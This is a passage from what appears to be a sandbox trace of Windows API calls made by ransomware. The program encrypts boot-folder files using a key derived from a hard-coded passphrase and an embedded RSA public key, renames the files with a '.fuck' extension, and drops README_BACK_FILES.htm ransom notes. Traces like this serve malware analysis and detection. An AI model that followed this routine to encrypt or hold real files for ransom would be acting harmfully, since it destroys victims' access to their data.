pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e078, pcbBinary=0x2c5e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.190] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e04c, pcbStructInfo=0x2c5e054 | out: pvStructInfo=0x2c5e04c, pcbStructInfo=0x2c5e054) returned 1 [0140.190] CryptAcquireContextA (in: phProv=0x2c5e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e068*=0x28054b0) returned 1 [0140.190] CryptImportPublicKeyInfo (in: hCryptProv=0x28054b0, dwCertEncodingType=0x1, pInfo=0x27fff00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27fff30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27fff38*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e060 | out: phKey=0x2c5e060*=0x27ff058) returned 1 [0140.190] CryptEncrypt (in: hKey=0x27ff058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e050*=0x80) returned 1 [0140.191] CryptEncrypt (in: hKey=0x27ff058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804d40*, pdwDataLen=0x2c5e064*=0x18, dwBufLen=0x80 | out: pbData=0x2804d40*, pdwDataLen=0x2c5e064*=0x80) returned 1 [0140.191] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2804d40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e074, lpOverlapped=0x0 | out: lpBuffer=0x2804d40*, lpNumberOfBytesWritten=0x2c5e074*=0x80, lpOverlapped=0x0) returned 1 [0140.192] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e074, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e074*=0x0, lpOverlapped=0x0) returned 0 [0140.192] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e074*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e074*=0x10) returned 1 [0140.192] WriteFile (in: hFile=0x5d5c, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e074, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e074*=0x10, lpOverlapped=0x0) returned 1 [0140.192] CloseHandle (hObject=0xffffffff) returned 1 [0140.192] CloseHandle (hObject=0x5d5c) returned 1 [0140.193] CopyFileA (lpExistingFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.gsg" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.gsg"), lpNewFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), bFailIfExists=0) returned 0 [0140.197] SetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui", dwFileAttributes=0x0) returned 0 [0140.198] DeleteFileA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.gsg" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.gsg")) returned 1 [0140.199] MoveFileA (lpExistingFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), lpNewFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.fuck" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.fuck")) returned 0 [0140.199] CryptDestroyHash (hHash=0x27ff4d8) returned 1 [0140.199] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.199] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.199] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 0 [0140.199] FindClose (in: hFindFile=0x27ff358 | out: hFindFile=0x27ff358) returned 1 [0140.200] GetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\boot\\resources\\en-us\\readme_back_files.htm")) returned 0xffffffff [0140.200] AreFileApisANSI () returned 1 [0140.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d4b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0140.200] CreateFileW (lpFileName="C:\\\\Boot\\Resources\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\boot\\resources\\en-us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.200] GetFileType (hFile=0x5d54) returned 0x1 [0140.200] WriteFile (in: hFile=0x5d54, lpBuffer=0x2c5df30*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5df28, lpOverlapped=0x0 | out: lpBuffer=0x2c5df30*, lpNumberOfBytesWritten=0x2c5df28*=0x5ec, lpOverlapped=0x0) returned 1 [0140.201] FindNextFileA (in: hFindFile=0x27fef58, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.201] FindClose (in: hFindFile=0x27fef58 | out: hFindFile=0x27fef58) returned 1 [0140.202] GetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\README_BACK_FILES.htm" (normalized: "c:\\boot\\resources\\readme_back_files.htm")) returned 0xffffffff [0140.202] AreFileApisANSI () returned 1 [0140.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0140.202] CreateFileW (lpFileName="C:\\\\Boot\\Resources\\README_BACK_FILES.htm" (normalized: "c:\\boot\\resources\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.202] GetFileType (hFile=0x5d50) returned 0x1 [0140.202] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.204] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.204] FindFirstFileA (in: lpFileName="C:\\\\Boot\\ro-RO\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff5d8 [0140.204] FindNextFileA (in: hFindFile=0x27ff5d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.204] FindNextFileA (in: hFindFile=0x27ff5d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.204] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.204] GetLastError () returned 0x0 [0140.204] GetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui")) returned 0x20 [0140.205] SetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.205] CreateFileA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.205] CreateFileA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.206] SetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.206] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.208] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.208] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.208] CryptHashData (hHash=0x27fef58, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.208] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27fef58, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff4d8) returned 1 [0140.208] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.209] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.209] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804c30) returned 1 [0140.209] CryptImportPublicKeyInfo (in: hCryptProv=0x2804c30, dwCertEncodingType=0x1, pInfo=0x27ffaf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ffb20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ffb28*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff258) returned 1 [0140.209] CryptEncrypt (in: hKey=0x27ff258, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.209] CryptEncrypt (in: hKey=0x27ff258, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804a98*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804a98*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.210] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804a98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804a98*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.211] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.211] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.211] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.211] CloseHandle (hObject=0xffffffff) returned 1 [0140.211] CloseHandle (hObject=0x5d54) returned 1 [0140.212] CopyFileA (lpExistingFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.216] SetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.216] DeleteFileA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.gsg")) returned 1 [0140.218] MoveFileA (lpExistingFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.fuck")) returned 0 [0140.218] CryptDestroyHash (hHash=0x27fef58) returned 1 [0140.218] CryptDestroyKey (hKey=0x27ff4d8) returned 1 [0140.218] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.218] FindNextFileA (in: hFindFile=0x27ff5d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.218] FindClose (in: hFindFile=0x27ff5d8 | out: hFindFile=0x27ff5d8) returned 1 [0140.218] GetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ro-ro\\readme_back_files.htm")) returned 0xffffffff [0140.218] AreFileApisANSI () returned 1 [0140.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.218] CreateFileW (lpFileName="C:\\\\Boot\\ro-RO\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ro-ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.219] GetFileType (hFile=0x5d50) returned 0x1 [0140.219] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.220] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.220] FindFirstFileA (in: lpFileName="C:\\\\Boot\\ru-RU\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff4d8 [0140.221] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.221] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.221] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.221] GetLastError () returned 0x0 [0140.221] GetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui")) returned 0x20 [0140.221] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.222] CreateFileA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.222] CreateFileA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.222] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.223] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.225] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.225] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.225] CryptHashData (hHash=0x27ff218, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.225] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff218, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff098) returned 1 [0140.225] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.225] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.225] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2805428) returned 1 [0140.226] CryptImportPublicKeyInfo (in: hCryptProv=0x2805428, dwCertEncodingType=0x1, pInfo=0x27fffd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800000*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800008*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fef58) returned 1 [0140.226] CryptEncrypt (in: hKey=0x27fef58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.226] CryptEncrypt (in: hKey=0x27fef58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2805070*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2805070*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.226] WriteFile (in: hFile=0x5d54, lpBuffer=0x2805070*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2805070*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.227] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.227] CryptEncrypt (in: hKey=0x27ff098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.227] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.227] CloseHandle (hObject=0xffffffff) returned 1 [0140.227] CloseHandle (hObject=0x5d54) returned 1 [0140.230] CopyFileA (lpExistingFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.234] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.300] DeleteFileA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.gsg")) returned 1 [0140.301] MoveFileA (lpExistingFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.fuck")) returned 0 [0140.301] CryptDestroyHash (hHash=0x27ff218) returned 1 [0140.301] CryptDestroyKey (hKey=0x27ff098) returned 1 [0140.301] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.301] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.301] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.302] GetLastError () returned 0x5 [0140.302] GetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui")) returned 0x20 [0140.302] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0140.302] CreateFileA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.302] CreateFileA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.303] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.303] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.305] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.305] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.305] CryptHashData (hHash=0x27fef98, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.305] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27fef98, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff358) returned 1 [0140.306] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.306] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.306] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2805180) returned 1 [0140.306] CryptImportPublicKeyInfo (in: hCryptProv=0x2805180, dwCertEncodingType=0x1, pInfo=0x28008c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28008f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28008f8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff098) returned 1 [0140.306] CryptEncrypt (in: hKey=0x27ff098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.306] CryptEncrypt (in: hKey=0x27ff098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804f60*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804f60*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.306] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804f60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804f60*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.307] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.308] CryptEncrypt (in: hKey=0x27ff358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.308] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.308] CloseHandle (hObject=0xffffffff) returned 1 [0140.308] CloseHandle (hObject=0x5d54) returned 1 [0140.308] CopyFileA 